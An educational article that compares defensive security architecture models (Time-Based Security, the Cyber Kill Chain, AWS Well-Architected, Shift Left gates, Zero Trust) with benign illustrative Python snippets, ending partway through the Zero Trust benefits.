Security Architecture Models

  1. Introduction
  2. The Downfall of Traditional Security Architecture
  3. A new age needs new strategies
    1. Time-Based Security
      1. What is Time-Based Security?
      2. Benefits and Limitations of TBS
        1. Benefits
        2. Limitations
    2. Lockheed Martin Cyber Kill Chain
      1. Structure of the Cyber Kill Chain
      2. Benefits and limitations of the Cyber Kill Chain
        1. Benefits
        2. Limitations
    3. Combination Approach
      1. Combining approaches for success
      2. Benefits and limitations of the Combined Model
        1. Benefits
        2. Limitations
    4. AWS Well-Architected Framework
      1. Overview of the Five Pillars
      2. Benefits and limitations of the Security Pillar
        1. Benefits
        2. Limitations
    5. Shift Left Model
      1. What are security gates
      2. Benefits and limitations of Shifting Left
        1. Benefits
        2. Limitations
    6. Zero Trust Model
      1. Definition of Zero Trust Security
      2. The Zero Trust Security Model
      3. Benefits and limitations of Zero Trust Security
        1. Benefits
        2. Limitations
    7. MICCMAC
      1. Understanding MICCMAC
      2. Benefits and Limitations of MICCMAC
        1. Benefits
        2. Limitations


In this article, we will explore the different security architecture models available to us and what has driven the move towards zero trust. These models help us design and organize security controls, from the physical layer to the network, in a way that helps us prioritise our security investments by identifying gaps. We will look at the deficiencies of traditional models and at newer defensible security architectures.

Network security is a key focus of many security technologies, with the goal of identifying and handling good and bad traffic appropriately, and critical controls like Next-Generation Firewalls (NGFW) and Intrusion Detection Systems (IDS) remain important. However, a network-only approach stems from the traditional security model, which concentrates on perimeter controls and often overlooks, or simply assumes, trust within the internal environment. A crunchy outside and a chewy inside is no longer sufficient, and the architectures we will look at have evolved to be more comprehensive and data-centric.

There have been many great thinkers behind early architecture methodologies, which have grown increasingly complex over the years to keep pace with ever-growing threats.

Bill Cheswick’s influential 1990 paper, “The Design of a Secure Internet Gateway,” introduced the concept of internet proxies (referred to as gateways). Cheswick highlighted the delicate balance between security and convenience in designing corporate gateways to the internet. Many organizations chose convenience, using a simple router to connect their internal networks to the rest of the world, which he deemed dangerous. Cheswick’s paper came in response to the Morris Worm, the first major internet worm released in 1988.

Other pioneers like Richard Bejtlich and Clifford Stoll have also significantly contributed to the understanding of blue teaming, the defensive aspect of cybersecurity. Clifford Stoll pioneered now-common controls such as perimeter security and honeypots in the 1980s, while more than a decade later, in the early 2000s, Bejtlich first outlined the key characteristics of defensible networks in his MICCMAC model: they can be monitored, limit intruders’ freedom to manoeuvre, offer minimal services, and can be updated. Taking the controls Stoll identified and structuring them into a model helped us understand our defensive controls and coverage.

The Downfall of Traditional Security Architecture

Traditional security architecture has struggled to keep pace with the ever-evolving landscape of cyber threats. An excessive focus on perimeter defence, insufficient attention to the internal environment, a lack of consideration for Bring Your Own Device (BYOD) policies and Internet of Things (IoT) devices, the organic growth of organizational technology stacks without proper security planning, and compliance-driven security all reduce the effectiveness of security in the modern day.

Traditional security architecture has several key deficiencies:

  • Overemphasis on perimeter defence: Traditional security approaches have prioritized the protection of network perimeters, often neglecting the need for robust internal security measures. This has led to the development of flat networks, which can be easily managed but are also susceptible to intruders pivoting from one compromised system to another.
  • De-perimeterization: The widespread adoption of cloud services, mobile devices, and IoT has eroded the classic network perimeter. Traditional perimeter controls, such as firewalls, struggle to secure these devices and services, which often escape the scrutiny applied to conventional network devices like desktops and servers.
  • Overreliance on preventive controls: Many organizations rely too heavily on preventive controls at the expense of defensive measures, leading to a lack of effective detective capabilities. When preventive controls inevitably fail, organizations often lack the necessary tools and resources to detect and respond to security incidents.
  • Compliance-driven security: Compliance is an essential aspect of security, but it should not be the primary goal. Compliance-driven security can be harmful when it is viewed as the primary end goal, as it may lead organizations to focus on meeting compliance standards rather than implementing a comprehensive security strategy.
  • Ignoring BYOD and IoT: Traditional security architecture has not adequately considered the challenges posed by BYOD policies and IoT devices. These devices can introduce new attack vectors and vulnerabilities that require a shift in security focus.
  • Organic growth of technology stacks without security planning: The rapid expansion of organizational technology stacks, driven by the adoption of new tools and technologies, has often occurred without proper security planning. This can lead to gaps in security coverage and a false sense of security.

The shortcomings of traditional security architecture have become increasingly apparent as organizations face new and emerging threats. We can no longer trust our perimeter to keep threats out. Breaches are now holistic: it only takes one employee using Hola VPN to give a malicious actor access to your environment, one unpatched smart light bulb, or one annoyed employee who decided quiet quitting was not a sufficient way to express their disappointment in their organisation.

A new age needs new strategies

Time-Based Security

What is Time-Based Security?

Time-Based Security (TBS) is a security architecture model that shifts our understanding of cybersecurity from a static, barrier-focused approach to a dynamic, time-focused perspective. This model, pioneered by Winn Schwartau, focuses on three critical components: protection (P), detection (D), and response (R).

Under TBS, the primary questions that define the security posture of a system are:

  • How long will my protection hold (Protection)?
  • How long before we detect a compromise (Detection)?
  • How long before we respond (Response)?

The crucial principle of TBS is that the time taken for protection (P) should exceed the sum of the time for detection (D) and response (R). If this principle holds, your systems are secure. If not, you are at risk.

Traditionally, security has been about building robust protection mechanisms. In contrast, TBS argues that no protection is impenetrable given enough time and resources. Therefore, it places equal importance on detecting breaches and responding to them.

To illustrate, consider a physical safe designed to protect valuable assets. The safe has a specific rating indicating how long it can withstand an attack. However, relying solely on the safe’s resilience is not enough. We complement the safe with detection mechanisms—sensors, alarms, cameras—and a response plan to counteract when a breach is detected.

TBS applies the same concept to cybersecurity. It recognizes that given enough time, an attacker can bypass any protection mechanism. Therefore, it emphasizes the need for robust detection systems to identify breaches quickly and response mechanisms to mitigate the impact.
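
The TBS principle can be sketched in a few lines of code. This is a minimal illustration, assuming hypothetical time measurements in hours; real values would come from penetration testing, detection benchmarks, and incident-response drills.

```python
# Time-Based Security check: a system is considered secure when the time its
# protection holds (P) exceeds detection time (D) plus response time (R).
# All time values here are illustrative, measured in hours.

def is_secure(protection: float, detection: float, response: float) -> bool:
    """TBS principle: P > D + R."""
    return protection > detection + response

def exposure(protection: float, detection: float, response: float) -> float:
    """Exposure window in hours; zero or negative means no exposure."""
    return (detection + response) - protection

print(is_secure(24, 4, 8))   # True: protection (24h) outlasts D + R (12h)
print(exposure(10, 4, 8))    # 2.0 hours of exposure: the system is at risk
```

Shrinking detection and response times is often cheaper than hardening protection further, which is why TBS pushes investment towards monitoring and incident response.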

Benefits and Limitations of TBS

Benefits
  • Quantitative Assessment: TBS provides a reproducible method to understand how much security a product or technology provides. It uses measurable time-based metrics, allowing for more informed decision-making about security investments.
  • Holistic View: TBS considers all aspects of security—protection, detection, and response. This comprehensive approach enables a more robust security posture that goes beyond mere defensive walls.
  • Proactive Risk Management: By focusing on detection and response, TBS encourages proactive risk management. It recognizes that breaches are inevitable and plans accordingly.

Limitations
  • Difficulty in Measuring Time: Accurately measuring protection, detection, and response times can be challenging in complex environments with multiple layers of security.
  • Changing Threat Landscape: The dynamic nature of cybersecurity threats means that the effectiveness of protection mechanisms may change over time, requiring regular reassessment of the TBS model.
  • Resource Intensive: Implementing a TBS model can be resource-intensive, requiring significant investments in monitoring, detection, and response capabilities.

Lockheed Martin Cyber Kill Chain

The Cyber Kill Chain, also known as the Intrusion Kill Chain, is a model designed by Lockheed Martin to help organizations understand and counteract cyberattacks. This model draws its inspiration from military kill chains, which predate computers and describe a series of steps an attacker must take to achieve their objectives. By identifying these steps and deploying countermeasures at each stage, organizations can significantly reduce the chances of a successful cyberattack. In this section, we will explore the Cyber Kill Chain, its benefits and limitations, and where it can be effectively applied.

Structure of the Cyber Kill Chain

The Cyber Kill Chain outlines the stages of a cyberattack, providing a framework for organizations to detect, analyze, and defend against threats. Below is an example model comprising the seven stages, each with specific countermeasures that can be deployed to prevent or mitigate the impact of an attack.

Reconnaissance

In this stage, the attacker gathers information about the target organization, such as network infrastructure, systems, and potential vulnerabilities. They may use publicly available information or more advanced methods like scanning and social engineering.

Countermeasures: Implement network segmentation, deploy intrusion detection systems (IDS), monitor network traffic, and enforce strict access controls. Raise awareness about social engineering tactics and educate employees on how to recognize and report suspicious activities.

Weaponization

The attacker creates a weapon, such as malware or a malicious payload, and packages it with an exploit to take advantage of a specific vulnerability.

Countermeasures: Ensure that systems are up-to-date with the latest security patches, deploy antivirus and anti-malware solutions, and employ application whitelisting to prevent unauthorized software from running.

Delivery

The attacker delivers the weapon to the target, using methods such as email attachments, drive-by downloads, or malicious websites.

Countermeasures: Deploy email security solutions that scan for malicious attachments and links, implement web content filtering, and secure network perimeters using firewalls and intrusion prevention systems (IPS).

Exploitation

The attacker exploits the vulnerability, allowing them to execute the malicious payload on the target system.

Countermeasures: Employ vulnerability management processes to identify, prioritize, and remediate vulnerabilities. Implement network and host-based intrusion detection and prevention systems to detect and block exploit attempts.

Installation

The attacker installs the malware on the compromised system, enabling them to maintain persistence and control over the system.

Countermeasures: Use endpoint security solutions to detect and prevent malware installation, implement application control policies, and enforce the principle of least privilege to limit the potential impact of a compromised account.

Command and Control (C2)

The attacker establishes a connection to a command and control server, which allows them to remotely control the compromised system and potentially exfiltrate data.

Countermeasures: Monitor outbound network traffic for suspicious connections, block known malicious IPs and domains, and implement network segmentation to limit lateral movement within the network.

Actions on Objectives

The attacker carries out their intended objective, such as data exfiltration, encryption for ransom, or destruction of data and systems.

Countermeasures: Implement robust data backup and recovery plans, deploy data loss prevention (DLP) solutions, and establish incident response plans to quickly detect, contain, and remediate threats.
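
The seven stages and their example countermeasures can be summarized as a simple lookup table. The stage names follow Lockheed Martin’s model; the countermeasure lists are condensed from the descriptions above, not an exhaustive catalogue.

```python
# Cyber Kill Chain stages mapped to example countermeasures (condensed).
KILL_CHAIN = {
    1: ("Reconnaissance", ["network segmentation", "IDS", "awareness training"]),
    2: ("Weaponization", ["patching", "anti-malware", "application whitelisting"]),
    3: ("Delivery", ["email scanning", "web content filtering", "firewalls/IPS"]),
    4: ("Exploitation", ["vulnerability management", "host/network IDPS"]),
    5: ("Installation", ["endpoint security", "least privilege"]),
    6: ("Command and Control", ["egress monitoring", "IP/domain blocking"]),
    7: ("Actions on Objectives", ["backups", "DLP", "incident response plans"]),
}

def countermeasures_for(stage: int) -> list[str]:
    """Return the example countermeasures for a given kill-chain stage."""
    _, measures = KILL_CHAIN[stage]
    return measures

print(KILL_CHAIN[6][0])        # Command and Control
print(countermeasures_for(5))  # ['endpoint security', 'least privilege']
```

Disrupting any single stage breaks the chain, which is why coverage across all seven stages matters more than depth at any one of them.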

Benefits and limitations of the Cyber Kill Chain

Benefits
  1. Provides a structured approach: The Cyber Kill Chain offers a systematic way for organizations to analyze and prioritize their security investments. By understanding the stages of an attack, organizations can develop targeted strategies to disrupt the chain and prevent attackers from achieving their objectives.
  2. Enhances detection and response: The model helps organizations identify the various stages of a cyberattack, enabling them to deploy appropriate countermeasures at each stage. This improves detection and response capabilities, allowing organizations to prevent or mitigate the impact of cyberattacks.
  3. Encourages proactive security measures: The Cyber Kill Chain encourages organizations to adopt a proactive approach to cybersecurity by focusing on disrupting the attack chain before it reaches its final stages.
  4. Adaptable to various contexts: While the model is often applied to malware and perimeter defenses, it can also be adapted to other contexts, making it a versatile tool for organizations to leverage in their cybersecurity efforts.


Limitations
  1. Limited scope: The Cyber Kill Chain primarily focuses on external threats and may not adequately address internal threats or other aspects of cybersecurity, such as insider threats, social engineering, or supply chain attacks.
  2. Overemphasis on prevention: The model heavily focuses on prevention, which can lead organizations to neglect other essential aspects of cybersecurity, such as detection, response, and recovery.
  3. Infrastructure-centric approach: Lockheed Martin’s countermeasures are primarily infrastructure-centric, which may not fully address the human element of cybersecurity or the need for robust security policies and procedures.

The Lockheed Martin Cyber Kill Chain provides a valuable framework for understanding and countering cyberattacks. While it has some limitations, organizations can benefit from its structured approach and adapt the model to suit their specific needs. By deploying countermeasures at each stage of the attack chain, organizations can significantly reduce the chances of a successful cyberattack and enhance their overall security posture.

Combination Approach

The rapidly evolving cybersecurity landscape requires innovative and robust defensive strategies. A synergistic approach that combines Time-Based Security (TBS), Lockheed Martin’s Cyber Kill Chain, and MITRE’s ATT&CK framework offers an effective solution. This holistic model allows Security Operations Centers (SOC) to block, detect, and react to threats as early as possible in the attack timeline.

Combining approaches for success

The combined model utilizes the strengths of each individual framework:

  1. Time-Based Security (TBS): TBS advocates for timely detection and response to threats. The key is to ensure that the sum of the time to detect (D) and react (R) to a threat is less than the time the system’s protection holds (P).
  2. Lockheed Martin’s Cyber Kill Chain: This model identifies seven stages of a cyberattack (reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on objectives). The goal is to detect and disrupt an attack as early in the kill chain as possible.
  3. MITRE’s ATT&CK Framework: This globally-accessible knowledge base of adversary tactics and techniques is based on real-world observations. It’s used as a foundation for the development of threat models and methodologies in the private sector, government, and the cybersecurity product and service community.

The goal is to detect and respond to threats before the ‘lateral movement’ step in the kill chain, known as the “breakout point”. For instance, during a simulated attack, a SOC will typically have multiple opportunities to block, detect, and react before the breakout point.

TBS and the OODA (Observe, Orient, Decide, Act) loop provide the context for tactical defensive decisions, allowing for efficient management of intrusion risk and minimizing the impact of a compromise.

Additionally, architecting for visibility is crucial. This involves obtaining raw telemetry from various data sources, including network, endpoint, and cloud. The goal is to ensure comprehensive coverage, not just detection, to avoid blind spots in security.
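
The breakout-point idea can be illustrated with a short sketch. The attack timeline below is hypothetical; in practice, timings would come from threat intelligence and red-team exercises.

```python
# Combined-model check: detection plus response must complete before the
# "breakout point" (lateral movement). All stage timings are hypothetical,
# expressed as hours since initial access.

attack_timeline = [
    ("delivery", 0.0),
    ("exploitation", 0.5),
    ("installation", 1.0),
    ("command_and_control", 2.0),
    ("lateral_movement", 6.0),   # the breakout point
]

def beats_breakout(detect: float, respond: float) -> bool:
    """True if the intrusion is contained before lateral movement begins."""
    breakout = dict(attack_timeline)["lateral_movement"]
    return detect + respond < breakout

print(beats_breakout(1.0, 2.0))  # True: contained at hour 3, breakout at hour 6
print(beats_breakout(4.0, 3.0))  # False: the attacker breaks out first
```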

In conclusion, the combination of TBS, Lockheed Martin’s Cyber Kill Chain, and MITRE’s ATT&CK framework provides a robust, comprehensive security architecture model. It enables proactive threat hunting, timely detection and response, and a nuanced understanding of cyber threats, equipping SOCs to effectively defend organizations against advanced adversaries.

Benefits and limitations of the Combined Model

Benefits
  1. Early Detection and Response: The combined model emphasizes early detection and response, minimizing the risk and potential impact of a breach.
  2. Greater Visibility and Context: It provides greater visibility into threats, offering a comprehensive view of attack techniques.
  3. Proactive Threat Hunting: By leveraging ATT&CK’s knowledge base, security teams can proactively hunt for threats, addressing potential false negatives from detection systems.

Limitations
  1. Complexity: Implementing and managing this combined approach requires significant technical expertise and resources.
  2. False Positives: While tuning for low false positives is critical, this could lead to false negatives, hence the need for proactive threat hunting.

AWS Well-Architected Framework

Amazon Web Services (AWS) has become a leading provider of cloud computing services, enabling organizations to build, deploy, and manage applications at scale. To help its clients, AWS produced the AWS Well-Architected Framework, which offers a set of guiding principles and best practices for building and maintaining cloud-native applications, with a focus on five core pillars.

The AWS Well-Architected Framework is a comprehensive guide designed to help cloud architects build secure, high-performing, resilient, and efficient infrastructure for their applications. The framework provides a consistent approach for customers and partners to evaluate architectures and implement designs that can scale over time. It is based on five pillars – Operational Excellence, Security, Reliability, Performance Efficiency, and Cost Optimization.

Overview of the Five Pillars

  1. Operational Excellence: Focuses on running and monitoring systems to deliver business value and continuously improve processes.
  2. Security: Emphasizes protecting information, systems, and assets while delivering business value through risk assessments and mitigation strategies.
  3. Reliability: Ensures the ability of a system to recover from infrastructure or service failures and dynamically scale to meet demand.
  4. Performance Efficiency: Involves using computing resources efficiently to meet system requirements and maintain efficiency as demand changes and technologies evolve.
  5. Cost Optimization: Aims to avoid unnecessary costs and ensure the effective use of resources, balancing cost with other architectural priorities.

The Security Pillar is a critical component of the AWS Well-Architected Framework, as it addresses the protection of information, systems, and assets. The pillar consists of several key design principles, such as implementing a strong identity foundation, enabling traceability, and applying security at all layers. It also encourages the use of automation to reduce human error and ensure consistent security policies.

Identity and Access Management (IAM)
This component focuses on ensuring that only authorized and authenticated users and services can access your AWS resources. IAM involves creating and managing user accounts, roles, groups, and permissions. By implementing a strong identity foundation, you can control who has access to which resources and what actions they can perform, reducing the risk of unauthorized access or malicious activities.
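
As a concrete illustration of a strong identity foundation, the snippet below builds an IAM policy document in the standard AWS JSON structure, granting read-only access to a single bucket. The bucket name is hypothetical.

```python
import json

# A minimal least-privilege IAM policy document (AWS IAM JSON structure).
# The bucket name "example-app-logs" is hypothetical.
read_only_policy = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": ["s3:GetObject", "s3:ListBucket"],
            "Resource": [
                "arn:aws:s3:::example-app-logs",
                "arn:aws:s3:::example-app-logs/*",
            ],
        }
    ],
}

print(json.dumps(read_only_policy, indent=2))
```

Attaching narrowly scoped policies like this to roles, rather than granting broad permissions to users, keeps the blast radius of a compromised credential small.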

Detective Controls
Detective controls involve continuously monitoring and logging activities within your AWS environment to identify potential security threats, anomalies, or misconfigurations. By enabling traceability, you can analyse logs, set up alerts, and detect unauthorized activities or policy violations promptly, allowing for quicker incident response and remediation.

Infrastructure Protection
This component emphasizes applying security at all layers of your infrastructure, from the edge network to your applications and data. Infrastructure protection involves implementing network segmentation, firewalls, intrusion detection and prevention systems (IDPS), web application firewalls (WAF), and secure configurations for operating systems, databases, and other components. It helps to minimize the attack surface and protect your resources from potential threats.

Data Protection
Data protection is about safeguarding your data at rest and in transit. This includes encrypting data, managing encryption keys, applying access controls, and using secure communication protocols (such as HTTPS and TLS). By following data protection best practices, you can prevent unauthorized access, disclosure, or alteration of sensitive information, ensuring data confidentiality, integrity, and availability.

Incident Response
Incident response is the process of preparing for, detecting, containing, and recovering from security incidents, such as data breaches or cyberattacks. This component involves developing an incident response plan, establishing a response team, and incorporating automation to reduce the time it takes to respond to incidents. By having a well-defined incident response process in place, you can minimize the impact of security incidents and prevent them from causing significant damage to your organization.

Benefits and limitations of the Security Pillar

Benefits
The AWS Well-Architected Framework offers several benefits over other architecture models, making it an appealing choice for organizations looking to build and optimize their cloud-based applications and infrastructure. It is most valuable to organisations looking to go “all-in” on AWS.

Comprehensive approach
The AWS Well-Architected Framework covers five essential pillars: Operational Excellence, Security, Reliability, Performance Efficiency, and Cost Optimization. This comprehensive approach ensures that all aspects of your cloud environment are addressed, providing a holistic view of your architecture and helping you identify potential areas of improvement.

Adherence to best practices
The framework is based on AWS’s own experience in designing, deploying, and optimizing cloud architectures for a wide range of use cases and industries. By following the framework’s design principles and best practices, you can ensure that your cloud environment is designed to be secure, efficient, and cost-effective.

Flexibility and adaptability
The AWS Well-Architected Framework can be applied to a wide range of cloud-based applications and infrastructure, from simple web applications to complex, multi-tier architectures. This flexibility makes it suitable for organizations of all sizes and across various industries.

Continuous improvement
The framework encourages a continuous improvement mindset, emphasizing regular reviews and optimizations of your cloud environment. By adopting this approach, you can ensure that your architecture remains up-to-date and aligned with your organization’s evolving needs and goals.

Vendor support
As the framework is developed and maintained by AWS, you can benefit from extensive documentation, tools, and support resources provided by the vendor. This includes AWS Well-Architected Tool, AWS Well-Architected Labs, and access to AWS Solution Architects and Partners, who can assist you in implementing the framework and optimizing your cloud environment.

Enhanced security
The Security Pillar within the framework focuses on critical aspects of cloud security, such as identity and access management, detective controls, infrastructure protection, data protection, and incident response. By implementing these components, you can build a robust security posture that protects your information, systems, and assets.

Cost optimization
The Cost Optimization Pillar helps you identify opportunities to reduce costs without sacrificing performance, security, or reliability. By following the framework’s recommendations, you can minimize waste and ensure that your cloud resources are used efficiently.

Limitations
While the AWS Well-Architected Framework offers numerous benefits, there are certain limitations compared to other architecture models that should be taken into consideration:

  1. AWS-centric approach: The framework is designed specifically for AWS services and architectures, which can limit its applicability to other cloud platforms or hybrid environments. Organizations using multiple cloud providers or on-premises infrastructure may need to adapt the framework or supplement it with additional guidance to ensure its relevance across their entire infrastructure.
  2. High-level guidance: The AWS Well-Architected Framework provides high-level design principles and best practices, which can be useful for establishing a solid foundation. However, it may not provide detailed implementation guidance for specific use cases or industries. Organizations might need to seek additional resources or consult with experts to address their unique requirements.
  3. Time and effort investment: Implementing the AWS Well-Architected Framework requires a considerable investment of time and effort, particularly for organizations with complex or large-scale cloud environments. This may involve conducting in-depth architecture reviews, implementing recommended changes, and continuously monitoring and optimizing the environment.
  4. Potential vendor lock-in: Adopting the AWS Well-Architected Framework could potentially lead to vendor lock-in, as it is designed to align with AWS services and best practices. Organizations seeking to maintain flexibility in their choice of cloud providers may need to consider alternative architecture models or develop a multi-cloud strategy to mitigate this risk.
  5. Limited community support: Unlike some open-source frameworks or industry standards, the AWS Well-Architected Framework is developed and maintained solely by AWS. While AWS offers extensive support and resources, the framework may not benefit from the same level of community-driven development, collaboration, and innovation that open-source alternatives might provide.
  6. Evolving framework: The AWS Well-Architected Framework is continuously evolving as AWS introduces new services and updates best practices. Organizations using the framework must commit to staying up-to-date with these changes and adapting their architectures accordingly, which can be challenging and time-consuming.

Shift Left Model

The Shift Left model emphasizes the importance of integrating testing and security practices early in the development process. This approach encourages developers, testers, and security teams to collaborate from the beginning of a project, ensuring that potential issues are identified and addressed before they become more complex and expensive to fix.

Infrastructure as Code (IaC) is the practice of managing and provisioning infrastructure components, such as networks, storage, and servers, through code instead of manual processes. IaC allows for faster and more consistent infrastructure deployment, which can lead to improved security as configurations can be standardized and audited more easily.

Software as Code (SaC) is the practice of treating software components and their configurations as code, similar to IaC. This approach ensures that software components are built, tested, and deployed in a consistent and repeatable manner, enhancing security by reducing configuration errors and inconsistencies.
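
One way IaC improves security is by applying a single hardened baseline to every definition and auditing for drift. The sketch below is illustrative; the setting names and server definitions are hypothetical.

```python
# IaC-style standardization: merge a hardened security baseline into every
# server definition, then audit the fleet for drift. Names are illustrative.

BASELINE = {"ssh_password_auth": False, "auto_patching": True, "logging": "central"}

def render_server(name, overrides=None):
    """Build a server definition with the baseline applied first."""
    return {"name": name, **BASELINE, **(overrides or {})}

fleet = [
    render_server("web-01"),
    render_server("db-01", {"logging": "central+local"}),
]

def audit_ssh(fleet):
    """Return servers drifting from the baseline SSH setting."""
    return [s["name"] for s in fleet if s["ssh_password_auth"]]

print(audit_ssh(fleet))  # []: no server allows SSH password auth
```

Because the whole fleet is generated from code, the same audit can run in a pipeline on every change, which is far harder to achieve with manually configured infrastructure.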

What are security gates

The Shift Left model allows potential vulnerabilities to be identified and resolved before they become more complex and expensive to fix. A gated release process enhances this approach by defining specific security criteria that must be met before code progresses to the next stage. Below is a typical gated release process with security gates; each gate can have different acceptance criteria as code deploys through our environments, from Dev to Prod:

  1. Planning and Design Gate: During the planning and design stage, the development team, testers, and security professionals collaborate to identify potential security risks and define security requirements. This gate ensures that security considerations are incorporated into the project’s architecture and design from the outset.
  2. SAST Gate (Static Application Security Testing Gate): The SAST gate is a checkpoint in the gated release process where static application security testing is performed. SAST involves analyzing the source code, byte code, or binary code of an application to identify potential security vulnerabilities without executing the application. By incorporating the SAST gate into the development process, organizations can detect and address security issues early on, before the code is deployed to a testing or production environment.
  3. OSS Gate (Open Source Software Gate): The OSS gate is a checkpoint in the gated release process that focuses on identifying and managing risks associated with using open-source software components in an application. This gate involves conducting an open-source software audit to inventory all OSS components, assess their licenses, and check for known vulnerabilities. By incorporating the OSS gate, organizations can ensure compliance with licensing requirements and reduce the risk of introducing vulnerable components into their applications.
  4. Container Scanning Gate: The Container Scanning gate is a checkpoint in the gated release process for applications that utilize containerized environments, such as Docker or Kubernetes. This gate involves scanning container images for known vulnerabilities, misconfigurations, and compliance with best practices. By incorporating the Container Scanning gate, organizations can ensure the security of their containerized applications and minimize the risk of deploying vulnerable containers.
  5. Infrastructure Scanning Gate: The Infrastructure Scanning gate is a checkpoint in the gated release process that involves scanning an organization’s infrastructure for potential security vulnerabilities and misconfigurations. This may include network devices, servers, storage systems, and cloud environments. By incorporating the Infrastructure Scanning gate, organizations can identify and address infrastructure-related security issues before they become exploitable vulnerabilities in a production environment.
  6. DAST Gate (Dynamic Application Security Testing Gate): The DAST gate involves conducting dynamic application security testing on running applications to identify security vulnerabilities that may not be detected during static analysis. DAST simulates real-world attacks and checks for issues such as injection attacks, cross-site scripting (XSS), and insecure authentication. By incorporating the DAST gate into the development process, organizations can identify and address security vulnerabilities that may only become apparent during runtime.

The big difference with this model is that everything runs through code, and technical controls block promotion through our environments until the code meets our acceptance criteria – for example, any medium or high vulnerability stops promotion of code into production. In today's modern environments, which make heavy use of cloud-native services, almost anything can be done as code, from user account management to firewall and network management.
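As a hedged sketch of what such a technical control might look like (the severity names and threshold here are invented, not taken from any particular pipeline product), a promotion gate can be as simple as a check that fails when scanner findings reach a blocking severity:

```python
# Minimal sketch of a severity-based promotion gate (hypothetical example).
# Findings would normally come from the SAST/OSS/container/infrastructure
# scanners described above, normalised into a common shape.
BLOCKING_SEVERITIES = {"medium", "high", "critical"}

def can_promote(findings):
    """Return True only if no finding is at a blocking severity."""
    return not any(f["severity"].lower() in BLOCKING_SEVERITIES for f in findings)

findings = [
    {"id": "CVE-2021-0001", "severity": "low"},
    {"id": "CVE-2021-0002", "severity": "high"},
]
print(can_promote(findings))  # -> False, the high finding blocks promotion
```

In a real pipeline this would run as a CI step after each gate, with the build failing (and promotion halting) whenever it returns False.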

Benefits and limitations of Shifting Left

Benefits
To effectively implement Shift Left in your organization, start by encouraging cross-functional collaboration between developers, testers, and security professionals from the beginning of the project. This will help ensure that potential security issues are identified and addressed as early as possible.

Utilize automation tools to streamline testing, security checks, and infrastructure deployment. Continuous Integration (CI) and Continuous Deployment (CD) pipelines can be particularly useful for automating these processes, ensuring that infrastructure and software components are consistently and securely deployed.

Leverage Infrastructure as Code (IaC) and Security as Code (SaC) to create standardized configurations for your infrastructure and software components. This will help to reduce configuration errors and inconsistencies, improving security across the organization.

Regularly monitor and audit your infrastructure and software components to identify potential security issues. Implement continuous monitoring tools and perform periodic audits to ensure that your configurations remain secure and compliant with industry best practices and regulatory requirements.
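As a minimal illustration of that auditing loop (the baseline keys and values below are hypothetical), a continuous-monitoring check can start as a simple comparison of the live configuration against its IaC baseline:

```python
# Hypothetical config-drift check: compare a live configuration against
# the declared IaC baseline and report every setting that deviates.
def find_drift(baseline, live):
    """Return {key: (expected, actual)} for each deviating setting."""
    drift = {}
    for key, expected in baseline.items():
        actual = live.get(key)
        if actual != expected:
            drift[key] = (expected, actual)
    return drift

baseline = {"encryption": "aes256", "public_access": False, "logging": True}
live = {"encryption": "aes256", "public_access": True, "logging": True}
print(find_drift(baseline, live))  # -> {'public_access': (False, True)}
```

A scheduled job running a check like this against every deployed resource turns periodic audits into continuous ones.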

Equip your team with the necessary skills and knowledge to effectively implement Shift Left, IaC, and SaC approaches. Provide training on security best practices, testing methodologies, and relevant tools to ensure that all team members can contribute to the success of the initiative.

Limitations
  1. Increased Complexity: Integrating security into every stage of the SDLC can increase complexity. Development teams must be well-versed in security principles and practices, which can be a steep learning curve.
  2. Resource Intensive: Shift Left security requires a considerable investment of resources, including time and personnel. It requires skilled security professionals who can work closely with development teams, which may be a challenge for smaller organizations or those with limited budgets.
  3. Potential for Slower Development Cycle: While the aim of Shift Left is to streamline the development process by catching issues early, it can initially lead to a slower development cycle, as new practices and checks are introduced.
  4. Dependency on Automation Tools: Shift Left security relies heavily on automation tools to scan and detect vulnerabilities during the early stages of development. However, these tools are not infallible and may miss some types of vulnerabilities, leading to a false sense of security.
  5. Risk of Overemphasis on Security: While the idea of ‘security first’ is fundamentally sound, there’s a risk of overemphasizing security to the detriment of other important aspects of software development, such as functionality and user experience.
  6. Culture Shift Requirement: Shift Left requires a significant culture shift within the organization. Everyone involved in the SDLC, from developers to operations, must embrace security as a part of their role. This change can face resistance and require considerable effort and leadership commitment to implement effectively.
  7. Potential for Increased Conflicts: Integrating security into the SDLC could potentially lead to more conflicts between the security team and the development team, especially if the security measures are perceived as hindering the development process or the implementation of certain features.

Zero Trust Model

The concept of Zero Trust Security challenges the traditional “trust but verify” model, replacing it with “never trust, always verify”. Coined by John Kindervag at Forrester, it offers a more comprehensive and secure model for today’s complex digital landscape.

Definition of Zero Trust Security

Zero Trust Security is a cybersecurity model that eliminates the concept of trust based on network location. It operates on the principle that no user or device, whether inside or outside the organization’s network, should be trusted by default. Instead, every access request is thoroughly verified before granting access. This approach embeds security into the DNA of your IT architecture, fundamentally transforming the design of networks from the inside out.

The Zero Trust Security Model

The Zero Trust Security model revolves around three main concepts:

  1. Secure Access: Ensure all resources are accessed securely, regardless of their location.
  2. Least Privilege Access: Adopt a strategy that enforces strict access control, granting users only the permissions they need to perform their tasks.
  3. Inspect and Log All Traffic: Monitor and log all network traffic to detect and respond to suspicious activities promptly.
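A hedged sketch of these three concepts in code (the user, entitlements, and policy below are invented for illustration) might be a per-request decision that checks identity, device posture, and least-privilege entitlements – never network location – and logs every outcome:

```python
# Hypothetical Zero Trust policy check: each request is evaluated on
# identity, device posture, and entitlement -- never on source network.
import logging

logging.basicConfig(level=logging.INFO)

# Least-privilege grants: users hold only the permissions they need
ENTITLEMENTS = {"alice": {"payroll:read"}}

def authorize(user, device_compliant, mfa_passed, permission):
    """Verify explicitly on every request and log the decision."""
    allowed = (
        mfa_passed
        and device_compliant
        and permission in ENTITLEMENTS.get(user, set())
    )
    logging.info("user=%s perm=%s allowed=%s", user, permission, allowed)
    return allowed

print(authorize("alice", device_compliant=True, mfa_passed=True, permission="payroll:read"))   # True
print(authorize("alice", device_compliant=False, mfa_passed=True, permission="payroll:read"))  # False
```

Note there is no check on source IP anywhere: an on-premise request and a remote one are evaluated identically.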

The model was officially published in NIST SP 800-207 in August 2020 and offers a way to transition from the traditional “candy bar” network design, with its vulnerable “soft, chewy center,” to a more secure architecture. Implementation can start with new projects or technologies, followed by converting existing technologies, and gradually chipping away at the rest.

Benefits and limitations of Zero Trust Security

Benefits
  1. Enhanced Security: By assuming all traffic is untrusted, Zero Trust Security significantly reduces the risk of a breach.
  2. Greater Visibility: By inspecting and logging all traffic, organizations gain greater visibility into their network activities, enabling them to detect and respond to threats more quickly.
